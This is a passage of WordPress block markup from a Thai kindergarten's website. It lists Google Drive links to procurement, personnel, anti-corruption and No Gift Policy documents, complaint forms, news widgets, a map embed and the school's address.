(DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 